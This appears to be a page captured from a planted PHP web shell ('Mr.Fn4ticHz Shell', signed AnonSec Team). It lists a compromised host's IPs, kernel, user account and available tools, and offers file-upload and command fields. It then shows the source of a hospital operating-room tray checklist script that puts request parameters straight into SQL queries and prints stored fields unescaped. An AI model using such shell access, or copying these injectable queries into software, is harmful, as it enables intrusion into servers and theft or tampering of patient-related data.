Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 52.15.111.77
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//showpage_outortraychecklist.php
   <?php
     session_start();
     include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		   	include 'dashboarddocument.php';
}
?>
	  

  <?php

include 'fileheader.php';
?>
 <style>
                     
       .center {
   border: 1px solid grey;
   text-align:;
}
    .center2 {
   border: 5px solid grey;
   text-align:;
}
</style>

   <div class='center'>
       <table id='example2' class='table table-bordered table-hover'>
<?php 
		$sql ="SELECT * FROM ortray_out WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Sponege: </td>
<td width='50%'>$rs[sponege_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Sponge Holder  :  </td>
<td width='50%'>$rs[Sponge_Holder_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Gauge and Bandage  :  </td>
<td width='50%'>$rs[Gauge_and_Bandage_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Antiseptic  :  </td>
<td width='50%'>$rs[Antiseptic_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  BP Handle  :  </td>
<td width='50%'>$rs[BP_Handle_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Blade  :  </td>
<td width='50%'>$rs[Blade_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Bowl  :  </td>
<td width='50%'>$rs[Bowl_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Mop  :  </td>
<td width='50%'>$rs[Mop_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Towel  :  </td>
<td width='50%'>$rs[Towel_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Towel Clip  :  </td>
<td width='50%'>$rs[Towel_Clip_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Long Artery forceps  :  </td>
<td width='50%'>$rs[Long_forceps_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Small Artery Forceps  :  </td>
<td width='50%'>$rs[Small_Forceps_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Allis forceps  :  </td>
<td width='50%'>$rs[Allis_forceps_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Mayo Scissors  :  </td>
<td width='50%'>$rs[Mayo_Scissors_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Suture Cutting scissors  :  </td>
<td width='50%'>$rs[Suture_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Cord Cutting scissors  :  </td>
<td width='50%'>$rs[Cutting_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Needle Holder  :  </td>
<td width='50%'>$rs[Needle_Holder_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Tooth Forceps  :  </td>
<td width='50%'>$rs[Tooth_Forceps_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Doyens Retractors  :  </td>
<td width='50%'>$rs[Doyens_Retractors_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Suction Tube  :  </td>
<td width='50%'>$rs[Suction_Tube_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Cautery pencil  :  </td>
<td width='50%'>$rs[Cautery_pencil_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Right angle Forceps  :  </td>
<td width='50%'>$rs[Right_angle_Forceps_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Tenaculum  :  </td>
<td width='50%'>$rs[Tenaculum_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Kocher’s Forceps  :  </td>
<td width='50%'>$rs[Kocher_Forceps_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Babcock  :  </td>
<td width='50%'>$rs[Babcock_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Absorb Suture V 2-0 90CM  :  </td>
<td width='50%'>$rs[Absorb_Suture_out]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Absorb Suture V-1 90CM  :  </td>
<td width='50%'>$rs[Suture_V1_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Absorb Suture V 2-0 90CM  :  </td>
<td width='50%'>$rs[Suture_V2_out]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Non Absorb Suture  :  </td>
<td width='50%'>$rs[Non_Absorb_Suture_out]</td>
</tr>
";
}
?>




				</table>
				
	
</div>


Anon7 - 2022
AnonSec Team